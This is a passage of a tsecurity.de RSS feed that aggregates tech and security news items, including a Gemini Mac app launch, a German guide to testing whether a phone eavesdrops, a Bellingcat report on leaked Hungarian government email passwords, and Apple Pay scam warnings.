<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/04/gemini-mac.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>Google’s Gemini AI app is a constant top three iPhone app in the App Store. Starting today, Gemini is available as a dedicated Mac app as well. This makes macOS the first platform with a desktop Gemini AI app.  </p>



 <a data-layer-pagetype="post" data-layer-postcategory="ai,gemini,google,mac" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1048219" href="https://9to5mac.com/2026/04/15/google-launches-gemini-mac-app-heres-what-it-offers/#more-1048219" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone Volume Buttons Not Working on Calls? Here’s How to Fix It]]></title>
<description><![CDATA[If you have ever been on a phone call and tried to adjust the volume on iPhone and found the volume buttons aren’t responding, you’re not alone. This is a frustrating presumed bug that can happen on iPhone, and the volume buttons seem to stop working during phone calls, even though they can somet...]]></description>
<link>https://tsecurity.de/de/3436305/ios-mac-os/iphone-volume-buttons-not-working-on-calls-heres-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3436305/ios-mac-os/iphone-volume-buttons-not-working-on-calls-heres-how-to-fix-it/</guid>
<pubDate>Wed, 15 Apr 2026 18:55:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you have ever been on a phone call and tried to adjust the volume on iPhone and found the volume buttons aren’t responding, you’re not alone. This is a frustrating presumed bug that can happen on iPhone, and the volume buttons seem to stop working during phone calls, even though they can sometimes still ... <a class="read-more" href="https://osxdaily.com/2026/04/15/iphone-volume-buttons-not-working-on-calls-heres-how-to-fix-it/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s huge MacBook Pro overhaul is coming soon, here’s what we know]]></title>
<description><![CDATA[Apple just released a MacBook Pro update last month, but there’s more coming soon. Apple is expected to debut one of its biggest MacBook Pro updates ever later this year. Here’s everything we know so far. 



 more…]]></description>
<link>https://tsecurity.de/de/3432869/ios-mac-os/apples-huge-macbook-pro-overhaul-is-coming-soon-heres-what-we-know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3432869/ios-mac-os/apples-huge-macbook-pro-overhaul-is-coming-soon-heres-what-we-know/</guid>
<pubDate>Tue, 14 Apr 2026 19:08:05 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2025/10/Apple-MacBook-Pro-14-in-front-251015.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>Apple just <a href="https://9to5mac.com/2026/03/03/apple-launches-new-macbook-pro-with-m5-pro-and-m5-max-chips/">released</a> a <a href="https://geni.us/BdCqil">MacBook Pro update</a> last month, but there’s more coming soon. Apple is expected to debut one of its biggest MacBook Pro updates ever later this year. Here’s everything we know so far. </p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac,macbook-pro" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1048009" href="https://9to5mac.com/2026/04/14/apples-huge-macbook-pro-overhaul-is-coming-soon-heres-what-we-know/#more-1048009" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Belauscht Ihr Handy Sie heimlich? So einfach finden Sie das jetzt heraus]]></title>
<description><![CDATA[Wenn Sie ein Smartphone besitzen, haben Sie wahrscheinlich schon einmal ein unheimliches, aber nur allzu häufiges Szenario erlebt: Eines Tages sprechen Sie über ein beliebiges Thema, während Ihr Telefon neben Ihnen liegt, und am nächsten Tag bemerken Sie, dass Anzeigen zum selben Thema auftauchen...]]></description>
<link>https://tsecurity.de/de/3430931/it-nachrichten/belauscht-ihr-handy-sie-heimlich-so-einfach-finden-sie-das-jetzt-heraus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3430931/it-nachrichten/belauscht-ihr-handy-sie-heimlich-so-einfach-finden-sie-das-jetzt-heraus/</guid>
<pubDate>Tue, 14 Apr 2026 08:32:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Wenn Sie ein Smartphone besitzen, haben Sie wahrscheinlich schon einmal ein unheimliches, aber nur allzu häufiges Szenario erlebt: Eines Tages sprechen Sie über ein beliebiges Thema, während Ihr Telefon neben Ihnen liegt, und am nächsten Tag bemerken Sie, dass Anzeigen zum selben Thema auftauchen. Das ist beunruhigend. Woher wissen diese Anzeigen, worüber Sie gesprochen haben?</p>



<p>Ihr Smartphone könnte der Übeltäter sein. Bei jedem Smartphone ist das eingebaute Mikrofon ständig eingeschaltet, damit der virtuelle Assistent Ihre Sprachbefehle hören kann. Könnte es also sein,<a href="https://www.pcwelt.de/article/2449573/hoeren-smartphones-alles-neue-beweise-active-listening.html" target="_blank" rel="noreferrer noopener"> dass diese Geräte auch heimlich Ihre Gespräche belauschen, um Ihnen Werbung zu zeigen? </a>Hier finden Sie alles, was Sie dazu wissen müssen, und einen einfachen Test, um das herauszufinden.</p>



<h2 class="wp-block-heading">So finden Sie heraus, ob Ihr Telefon Sie abhört</h2>



<p>Um zu testen, ob Ihr Telefon Ihre Gespräche abhört, beginnen Sie damit, offen über ein einzigartiges Thema zu sprechen, nach dem Sie noch nie gesucht oder über das Sie noch nie gesprochen haben, während Ihr Telefon neben Ihnen eingeschaltet ist. Es ist wichtig, dass es sich um ein Thema handelt, das nichts mit Ihren üblichen Interessen oder Suchanfragen zu tun hat.</p>



<p>Diskutieren Sie ein oder zwei Tage lang laut über dieses Thema, während Ihr Telefon die ganze Zeit neben Ihnen liegt. Achten Sie darauf, dass Sie auf keinem Ihrer Geräte – nicht nur auf Ihrem Telefon – nach diesem Thema suchen.</p>



<p>Sie können auch versuchen, über bestimmte Dinge zu sprechen, die mit diesem Thema zu tun haben. Wenn Sie zum Beispiel über eine Reise nach Spanien sprechen, können Sie darüber reden, wie Sie Spanisch lernen oder welches das beste Restaurant für Paella in Madrid ist.</p>



<p>Achten Sie in dieser Zeit genau auf die Werbung, die Ihnen online angezeigt wird: Anzeigen in sozialen Medien, auf Websites, die Sie besuchen, in Apps, die Sie verwenden, und auf Ihrem Smart TV, wenn Sie einen haben. Wenn Sie dann Werbung zu dem Thema sehen, über das Sie sprechen möchten, haben Sie den Lauschangriff wahrscheinlich bestätigt und Ihr Telefon auf frischer Tat ertappt.</p>



<h2 class="wp-block-heading">Das können Sie tun, wenn Sie glauben, dass Ihr Telefon lauscht</h2>



<p>Bevor Sie das Mikrofon und die Kamera Ihres Telefons abkleben oder es in einen See werfen, gibt es ein paar weniger drastische Maßnahmen, die Sie ergreifen können, um den möglichen Lauschangriff einzudämmen.</p>



<p>Als Erstes sollten Sie die App-Berechtigungen auf Ihrem Gerät sorgfältig überprüfen. Es ist wahrscheinlich, dass Sie eine App heruntergeladen und ihr den Zugriff auf Ihr Mikrofon erlaubt haben, ohne es zu bemerken. Überprüfen Sie die Berechtigungen für jede App auf Ihrem Telefon und schränken Sie Apps ein, die keinen Zugriff auf Ihr Mikrofon, Ihre Kamera oder Ihre Standorteinstellungen benötigen.</p>



<p>Als Nächstes löschen Sie den Sprachverlauf und deaktivieren den digitalen Assistenten Ihres Telefons. Google, Siri und Alexa sind alle sehr praktisch, aber sie könnten aktiv (und passiv) alles aufzeichnen, was Sie sagen, ohne dass Sie es merken.</p>



<p>Im Jahr 2024 <a href="https://www.404media.co/heres-the-pitch-deck-for-active-listening-ad-targeting/" target="_blank" rel="noreferrer noopener">berichtete 404 Media</a>, dass ein Drittanbieter namens Cox Media Group (CMG), der die Technologie “Active Listening” anbietet, mit Unternehmen wie Amazon, Google und Microsoft zusammenarbeitet.</p>



<p>Diese Unternehmen haben zwar inzwischen dementiert, dass sie diese Technologie zum Ausspionieren von Handynutzern einsetzen, aber Tatsache ist, dass es diese Möglichkeiten gibt, und es wäre töricht anzunehmen, dass die Unternehmen diese Möglichkeiten nicht nutzen würden, um effektiver bei den Verbrauchern zu werben – schließlich machen sie den größten Teil ihrer Einnahmen mit Werbung.</p>



<p>Auch wenn Unternehmen die wahrscheinlichste Quelle für Lauschangriffe sind, besteht immer die Möglichkeit, dass Hacker Schwachstellen auf Ihrem Gerät ausnutzen <a href="https://www.pcwelt.de/article/2628595/decken-sie-ihre-computerkamera-ab-vergessen-sie-nicht-diesen-wichtigen-zusatzlichen-schritt-zum-schutz-ihrer-privatsphare.html" target="_blank" rel="noreferrer noopener">und die Kontrolle über das Mikrofon oder die Kamera übernehmen.</a> Der beste Weg, dies zu verhindern, besteht darin, sicherzustellen, dass Sie immer die neuesten Updates für das Betriebssystem Ihres Telefons und alle installierten Apps haben.</p>



<p>Alle diese Schritte helfen Ihnen, den unerwünschten Zugriff auf das Mikrofon Ihres Telefons zu unterbinden, aber wenn Sie immer noch unsicher sind, gibt es eine einfache Lösung. Schalten Sie Ihr Telefon einfach aus oder lassen Sie es liegen, wenn Sie private Dinge besprechen wollen. Das ist der beste Weg, um sicherzustellen, dass Ihr Telefon Sie nicht hören kann.</p>



<h2 class="wp-block-heading">Wenn Ihr Telefon nicht zuhört, wie kommt es dann an Ihre Daten?</h2>



<p>Auch wenn die Aussicht, dass Ihr Telefon ständig alle Ihre Gespräche belauscht, beunruhigend sein mag, gibt es doch unzählige Möglichkeiten, wie Sie dieselben Informationen preisgeben können, ohne sie jemals laut auszusprechen.</p>



<p>Jedes Smartphone ist eine wahre Fundgrube an persönlichen Daten, aus der alle Apps schöpfen können. Sie sind im Grunde Minicomputer, die mit Sensoren vollgepackt sind: Gyroskope, Beschleunigungsmesser, Magnetometer und so ziemlich jedes andere Messgerät, das Sie sich vorstellen können. Die von diesen Sensoren gesammelten Daten können eine schockierende Menge an Informationen über unsere Routinen, Gewohnheiten und Persönlichkeiten liefern. </p>



<p>Wo immer Sie sich aufhalten, mit welchen Menschen Sie sprechen oder Zeit verbringen, welche Lebensgewohnheiten Sie haben und persönliche Gesundheitsdaten sind nur einige der Metadaten und Telemetriedaten, die von Ihrem Telefon gesammelt werden. Ganz zu schweigen von all den riesigen Datenmengen, die Sie im Laufe der Jahre bereits an Ihre Apps und über Google-Suchen weitergegeben haben. </p>



<p>Ihr Telefon und die installierten Apps sammeln all diese Daten und senden sie an Dritte wie z.B. Datenbroker, um sie zu analysieren, zu verkaufen und Ihnen in Form von personalisierter Werbung wiederzugeben. </p>



<p>Auch wenn Sie vielleicht nicht über die oben erwähnte Reise nach Spanien gesprochen oder danach gesucht haben, hat Ihr Telefon vielleicht erraten, was Sie gedacht haben, und ist anhand der gesammelten Daten von selbst zu diesem Schluss gekommen. Vielleicht haben Ihre Freunde neben Ihnen nach spanischen Airbnb-Wohnungen gesucht, vielleicht haben Sie eine Sprachlern-App heruntergeladen und vor kurzem angefangen, Spanisch zu lernen, oder vielleicht zeigen Ihre Einkaufstrends, dass Sie in letzter Zeit vermehrt Safran und Jamón gekauft haben.</p>



<p>Alle diese Metadaten könnten der Grund für die unheimlich relevanten Anzeigen sein, die Sie sehen. Auch wenn Ihr Telefon wirklich mithören könnte, sind es vielleicht nur die unausgesprochenen Daten, die Sie auf andere Weise weitergeben, die Sie verraten.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>Lesen Sie weiter:</strong> <a href="https://www.pcwelt.de/article/1817297/hort-whatsapp-heimlich-mit-so-finden-sie-es-heraus.html" target="_blank" rel="noreferrer noopener">Hört Whatsapp heimlich mit? So finden Sie es heraus</a></p>
</blockquote>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your ReAct Agent Is Wasting 90% of Its Retries — Here’s How to Stop It]]></title>
<description><![CDATA[Most ReAct-style agents are silently wasting their retry budget on errors that can never succeed. In a 200-task benchmark, 90.8% of retries were spent on hallucinated tool calls — not model mistakes, but architectural flaws. This article shows why prompt tuning won’t fix it, and the three structu...]]></description>
<link>https://tsecurity.de/de/3426973/ai-nachrichten/your-react-agent-is-wasting-90-of-its-retries-heres-how-to-stop-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3426973/ai-nachrichten/your-react-agent-is-wasting-90-of-its-retries-heres-how-to-stop-it/</guid>
<pubDate>Sun, 12 Apr 2026 20:48:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most ReAct-style agents are silently wasting their retry budget on errors that can never succeed. In a 200-task benchmark, 90.8% of retries were spent on hallucinated tool calls — not model mistakes, but architectural flaws. This article shows why prompt tuning won’t fix it, and the three structural changes that eliminate wasted retries entirely.</p>
<p>The post <a href="https://towardsdatascience.com/your-react-agent-is-wasting-90-of-its-retries-heres-how-to-stop-it/">Your ReAct Agent Is Wasting 90% of Its Retries — Here’s How to Stop It</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Recovery scammers hit you when you’re down: Here’s how to avoid a second strike]]></title>
<description><![CDATA[If you’ve been the victim of fraud, you’re likely already a lead on a ‘sucker list’ – and if you’re not careful, your ordeal may be about to get worse. This article has been indexed from WeLiveSecurity Read the original…
Read more →
The post Recovery scammers hit you when you’re down: Here’s how ...]]></description>
<link>https://tsecurity.de/de/3425225/it-security-nachrichten/recovery-scammers-hit-you-when-youre-down-heres-how-to-avoid-a-second-strike/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3425225/it-security-nachrichten/recovery-scammers-hit-you-when-youre-down-heres-how-to-avoid-a-second-strike/</guid>
<pubDate>Sat, 11 Apr 2026 06:36:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you’ve been the victim of fraud, you’re likely already a lead on a ‘sucker list’ – and if you’re not careful, your ordeal may be about to get worse. This article has been indexed from WeLiveSecurity Read the original…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/recovery-scammers-hit-you-when-youre-down-heres-how-to-avoid-a-second-strike/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/recovery-scammers-hit-you-when-youre-down-heres-how-to-avoid-a-second-strike/">Recovery scammers hit you when you’re down: Here’s how to avoid a second strike</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Non-compete ban stirs optimism and uncertainty in Washington state — here’s what it means for tech]]></title>
<description><![CDATA[A new state law wipes out nearly all non-compete agreements in Washington, sparking debate across the tech ecosystem about innovation, talent mobility and employer rights. Read More]]></description>
<link>https://tsecurity.de/de/3424412/it-nachrichten/non-compete-ban-stirs-optimism-and-uncertainty-in-washington-state-heres-what-it-means-for-tech/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3424412/it-nachrichten/non-compete-ban-stirs-optimism-and-uncertainty-in-washington-state-heres-what-it-means-for-tech/</guid>
<pubDate>Fri, 10 Apr 2026 19:32:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1260" height="840" src="https://cdn.geekwire.com/wp-content/uploads/2026/04/HB-1155-4-1260x840.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://cdn.geekwire.com/wp-content/uploads/2026/04/HB-1155-4-1260x840.jpg 1260w, https://cdn.geekwire.com/wp-content/uploads/2026/04/HB-1155-4-768x512.jpg 768w, https://cdn.geekwire.com/wp-content/uploads/2026/04/HB-1155-4-1536x1024.jpg 1536w, https://cdn.geekwire.com/wp-content/uploads/2026/04/HB-1155-4-2048x1365.jpg 2048w" sizes="auto, (max-width: 1260px) 100vw, 1260px"><br>A new state law wipes out nearly all non-compete agreements in Washington, sparking debate across the tech ecosystem about innovation, talent mobility and employer rights. <a href="https://www.geekwire.com/2026/non-compete-ban-stirs-optimism-and-uncertainty-in-washington-state-heres-what-it-means-for-tech/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple unveiled a new high-end market opportunity this week]]></title>
<description><![CDATA[Though I reviewed Apple’s recently-introduced MacBook Neo, M5 MacBook Air, and M5 Max MacBook Pro, I didn’t look at Apple’s new displays. But it is noteworthy that even these products open up new opportunities for the company.



That’s because Apple this week gained FDA clearance for the Medical...]]></description>
<link>https://tsecurity.de/de/3424152/it-nachrichten/apple-unveiled-a-new-high-end-market-opportunity-this-week/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3424152/it-nachrichten/apple-unveiled-a-new-high-end-market-opportunity-this-week/</guid>
<pubDate>Fri, 10 Apr 2026 17:47:06 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Though I reviewed Apple’s recently-introduced <a href="https://www.computerworld.com/article/4145811/review-a-weekend-with-macbook-neo.html">MacBook Neo</a>, <a href="https://www.computerworld.com/article/4156722/the-new-m5-based-macbook-air-is-built-to-last-and-perform.html">M5 MacBook Air</a>, and <a href="https://www.computerworld.com/article/4148742/heres-what-5849-gets-you-in-an-m5-max-macbook-pro.html">M5 Max MacBook Pro</a>, I didn’t look at Apple’s new displays. But it is noteworthy that even these products open up new opportunities for the company.</p>



<p>That’s because Apple this week <a href="https://www.accessdata.fda.gov/scripts/cdrh/cfdocs/cfpmn/pmn.cfm?ID=K253582#chm" target="_blank" rel="noreferrer noopener">gained FDA clearance</a> for the Medical Imaging Calibration feature <a href="https://www.apple.com/newsroom/2026/03/apple-unveils-new-studio-display-and-all-new-studio-display-xdr/" target="_blank" rel="noreferrer noopener">introduced</a> in the Studio Display XDR. Just as the affordable <a href="https://www.applemust.com/macbook-neo-huge-success-but-can-apple-meet-demand/" target="_blank" rel="noreferrer noopener">MacBook Neo</a> opens up a fresh <a href="https://www.computerworld.com/article/4148190/is-macbook-neo-the-macs-iphone-moment.html">mass market opportunity</a>, this specialized product feature forges space in a new niche. </p>



<h2 class="wp-block-heading"><strong>Apple opens a new growth market</strong></h2>



<p>That niche will only become even more important once specialized AI medical tools to support treatment and diagnosis appear in the radiology space, as such tools inevitably will. (Inevitably? I mean, just look at this December <a href="https://www.icr.ac.uk/about-us/icr-news/detail/new-ai-models-set-to-revolutionise-medical-imaging-and-transform-cancer-care" target="_blank" rel="noreferrer noopener">research announcement from the Institute of Cancer Research</a>, which demonstrated that combining artificial intelligence (AI) with state-of-the-art MRI imaging can revolutionize prostate cancer treatment.)</p>



<p>The combination means you don’t need a dedicated radiology workstation costing in excess of $15,000; you need only a Mac and a $2,899 Apple display. </p>



<p>Once those things are in place, you can select your choice of imaging software — probably something like <a href="https://visageimaging.com/platform/visage-on-apple/" target="_blank" rel="noreferrer noopener">Visage Imaging 7</a>, <a href="https://www.osirix-viewer.com/osirix/osirix-md/" target="_blank" rel="noreferrer noopener">OsiriX MD</a>, <a href="https://www.falcon-viewer.com/" target="_blank" rel="noreferrer noopener">Falcon MD</a>, or another of the solutions available for Mac. Even better, while privacy and data confidentiality concerns do exist, the Mac you use for this work can also be used for other tasks, like any other Mac. This democratizes access to tools of this kind; gives the medical profession <a href="https://www.computerworld.com/article/4107165/apple-in-enterprise-industry-execs-on-what-works-and-what-they-want-in-26.html">all the Apple advantages</a> around product resilience, TCO, and tech support; cuts budgets; and enables medical tech purchasers to get more for less.</p>



<h2 class="wp-block-heading"><strong>On-device AI, an Apple advantage</strong></h2>



<p>Then we get to think about AI, and that’s where Apple’s <a href="https://www.computerworld.com/article/4150080/apples-ai-endgame-why-waiting-for-siri-could-make-it-a-winner.html">strategic sensibility</a> seems to be coming into play. I see it like this: it is obvious that AI for medical imaging will need to run on something. And what Apple has done with Apple Silicon, its approach to on-device AI, and this new medical image calibration feature on its displays all mean it now offers a trusted, highly usable, incredibly flexible solution to run future AI-augmented MRI imaging packages. Apple’s processors can simply shrug their way through that kind of work, while its new displays can give radiologists and other medical examiners the precise accuracy they need.</p>



<p>The new display feature also gives Apple an impressive story to tell in the $42.6 billion global market for medical imaging devices. That tale is tempered by Apple’s cast-iron commitment to privacy and the impressive capacity of Apple Silicon to run on-device LLMs. <a href="https://www.computerworld.com/article/4092162/apples-macos-ai-for-the-rest-of-us.html">Apple’s introduction of MLX</a> means you can easily imagine medical imaging deployments that rely on a new Studio Display and four Mac minis clustered via a single Thunderbolt 5 cable. Total cost? Not $15,000. </p>



<h2 class="wp-block-heading"><strong>Apple is cheap</strong></h2>



<p>Apple is cheap. That’s not an illusion. Look at the ecosystem. The entry level $599 MacBook Neo shows this, while all the TCO and tech support and security studies I’ve <a href="https://www.computerworld.com/article/1636221/cisco-macs-in-business-boost-productivity-and-security-cuts-costs.html">seen across the last decade</a> show that once you begin using these platforms you end up spending a lot less keeping your investments going.</p>



<p>That matters in any business, of course. But when it comes to the kind of industries Medical Imaging Calibration is meant for, that can be life-saving. Who wants urgent surgery to be delayed by an operating system crash or another Crowdstrike-like moment? </p>



<p>There might be problems getting this message through to every medical provider across the planet, but check out Emory University and its Department of Radiology and Imaging Sciences. There, you can peruse a white paper explaining most of the steps radiologists and imaging practices must take to integrate Apple’s displays and systems into their clinical workflows. </p>



<p>As <a href="https://www.applemust.com/mridisplay" target="_blank" rel="noreferrer noopener">explained here</a>, the paper praises the CPU/GPU performance of Macs used in the test, which rival or exceed traditional workstations at a fraction of the cost. The <a href="https://www.apple.com/healthcare/docs/site/Reimagining_Medical_Imaging_Paper.pdf" target="_blank" rel="noreferrer noopener">white paper</a> also opens a second dimension in medical practice, thanks to visionOS and the capacity to create new workflows that have the headset using new surgical apps from the likes of <a href="https://www.stryker.com/br/en/endoscopy/products/visionpro-led-display/index.html" target="_blank" rel="noreferrer noopener">Stryker</a> and <a href="https://www.karlstorz.com/us/en/karl-storz-launches-collaborator-3d-for-apple-vision-pro.htm" target="_blank" rel="noreferrer noopener">Storz</a>. Add AI to that equation and you can see that Apple has raised a very, very large flag depicting a very large Apple logo on part of the future of medical care. </p>



<p><em>Please follow me on Twitter, or join me in the <a href="https://mewe.com/join/appleholics_bar_and_grill" target="_blank" rel="noreferrer noopener">AppleHolic’s bar &amp; grill</a> and <a href="https://mewe.com/join/apple_discussions" target="_blank" rel="noreferrer noopener">Apple Discussions</a> groups on MeWe. Also, now on <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a>.</em><em></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungarian government email passwords exposed ahead of election]]></title>
<description><![CDATA[When voters in the forthcoming Hungarian election assess the current government, its record on internet security will not be one of its proudest achievements.



An analysis by open source investigation organization Bellingcat has revealed that the passwords for almost 800 Hungarian government em...]]></description>
<link>https://tsecurity.de/de/3423786/it-nachrichten/hungarian-government-email-passwords-exposed-ahead-of-election/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3423786/it-nachrichten/hungarian-government-email-passwords-exposed-ahead-of-election/</guid>
<pubDate>Fri, 10 Apr 2026 15:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>When voters in the forthcoming Hungarian election assess the current government, its record on internet security will not be one of its proudest achievements.</p>



<p>An <a href="https://www.bellingcat.com/news/2026/04/09/the-hungarian-government-passwords-exposed-online/" target="_blank" rel="noreferrer noopener">analysis by open source investigation organization Bellingcat</a> has revealed that the passwords for almost 800 Hungarian government email accounts are circulating online, many of them associated with national security. These breaches in security are not down to high-tech attacks but rather are the result of poor email hygiene among government employees. The security leaks were widespread: 12 out of 13 government departments were affected.</p>



<p>Hungarian Prime Minister Viktor Orban’s administration likes to present itself as firm protector of Hungarian borders, resisting foreign interference, but this doesn’t seem to apply to its computing prowess. Among those whose details were revealed were an officer responsible for information security and a counter-terrorism expert.</p>



<p>Bellingcat found that government officials have been using <a href="https://www.csoonline.com/article/4021827/the-10-most-common-it-security-mistakes.html#:~:text=The%20problem%3A%20Weak%20passwords">weak passwords</a> such as variations of the word “Password” or the number sequence “1234567, while another simply used his surname.</p>



<p>The Hungarian government is not alone in its laxity.  Earlier this year, <a href="https://www.pcworld.com/article/3041604/6-billion-passwords-reveal-you-should-not-use-these-login-details.html">Specops found that 6 billion logins</a> had been exposed online and found that number sequences and ‘password’ featured highly in the list of the most compromised logins.</p>



<p>The vulnerabilities inherent in the Hungarian example are a warning to all CSOs that they should be reminding their staff to tighten their security credentials. Many choose simple, short memorable passwords because they’re easy to remember but using a <a href="https://www.pcworld.com/article/2607601/memorizing-a-good-email-password-is-easy-heres-how-to-do-it.html">password manager</a> or deploying <a href="https://www.computerworld.com/article/4009132/passkeys-how-they-work-how-to-use-them.html">passkeys</a> will immediately strengthen employees’ ability to protect data.</p>



<p><em>This article first appeared on <a href="https://www.csoonline.com/article/4157215/hungarian-government-email-passwords-exposed-ahead-of-election.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungarian government email passwords exposed ahead of election]]></title>
<description><![CDATA[When voters in the forthcoming Hungarian election assess the current government, its record on internet security will not be one of its proudest achievements.



An analysis by open source investigation organization Bellingcat has revealed that the passwords for almost 800 Hungarian government em...]]></description>
<link>https://tsecurity.de/de/3423744/it-security-nachrichten/hungarian-government-email-passwords-exposed-ahead-of-election/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3423744/it-security-nachrichten/hungarian-government-email-passwords-exposed-ahead-of-election/</guid>
<pubDate>Fri, 10 Apr 2026 15:24:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>When voters in the forthcoming Hungarian election assess the current government, its record on internet security will not be one of its proudest achievements.</p>



<p>An <a href="https://www.bellingcat.com/news/2026/04/09/the-hungarian-government-passwords-exposed-online/" target="_blank" rel="noreferrer noopener">analysis by open source investigation organization Bellingcat</a> has revealed that the passwords for almost 800 Hungarian government email accounts are circulating online, many of them associated with national security. These breaches in security are not down to high-tech attacks but rather are the result of poor email hygiene among government employees. The security leaks were widespread: 12 out of 13 government departments were affected.</p>



<p>Hungarian Prime Minister Viktor Orban’s administration likes to present itself as firm protector of Hungarian borders, resisting foreign interference, but this doesn’t seem to apply to its computing prowess. Among those whose details were revealed were an officer responsible for information security and a counter-terrorism expert.</p>



<p>Bellingcat found that government officials have been using <a href="https://www.csoonline.com/article/4021827/the-10-most-common-it-security-mistakes.html#:~:text=The%20problem%3A%20Weak%20passwords">weak passwords</a> such as variations of the word “Password” or the number sequence “1234567, while another simply used his surname.</p>



<p>The Hungarian government is not alone in its laxity.  Earlier this year, <a href="https://www.pcworld.com/article/3041604/6-billion-passwords-reveal-you-should-not-use-these-login-details.html">Specops found that 6 billion logins</a> had been exposed online and found that number sequences and ‘password’ featured highly in the list of the most compromised logins.</p>



<p>The vulnerabilities inherent in the Hungarian example are a warning to all CSOs that they should be reminding their staff to tighten their security credentials. Many choose simple, short memorable passwords because they’re easy to remember but using a <a href="https://www.pcworld.com/article/2607601/memorizing-a-good-email-password-is-easy-heres-how-to-do-it.html">password manager</a> or deploying <a href="https://www.computerworld.com/article/4009132/passkeys-how-they-work-how-to-use-them.html">passkeys</a> will immediately strengthen employees’ ability to protect data.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Pay scams are rife, here's how to protect yourself and your money]]></title>
<description><![CDATA[Apple Pay is a quick and safe way to make purchases in person and online, but a new type of scam may use your faith in the system to steal thousands of dollars from you.Apple Pay is safe and secure, but scammers still target itThat's the warning from consumer advocacy outfit Consumer Affairs foll...]]></description>
<link>https://tsecurity.de/de/3423605/ios-mac-os/apple-pay-scams-are-rife-heres-how-to-protect-yourself-and-your-money/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3423605/ios-mac-os/apple-pay-scams-are-rife-heres-how-to-protect-yourself-and-your-money/</guid>
<pubDate>Fri, 10 Apr 2026 14:24:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://appleinsider.com/inside/apple-pay" title="Apple Pay" data-kpt="1">Apple Pay</a> is a quick and safe way to make purchases in person and online, but a new type of scam may use your faith in the system to steal thousands of dollars from you.<br><br><div><img src="https://photos5.appleinsider.com/gallery/66775-140032-Apple-Wallet-cards-xl.jpg" alt="iPhone showing Apple Wallet and a series of cards available for use"><br><span>Apple Pay is safe and secure, but scammers still target it</span></div><br>That's the warning from consumer advocacy outfit Consumer Affairs following a spate of Apple Pay-related scams. Fraudsters know that people trust Apple and the Apple Pay system, and they're using that trust as the basis for their scams.<br><br>The goal, as ever, is to confuse people to such an extent that they can be convinced to hand over their money. How that happens can vary from scam to scam, but there's one constant: Apple Pay.<br><br><br> <a 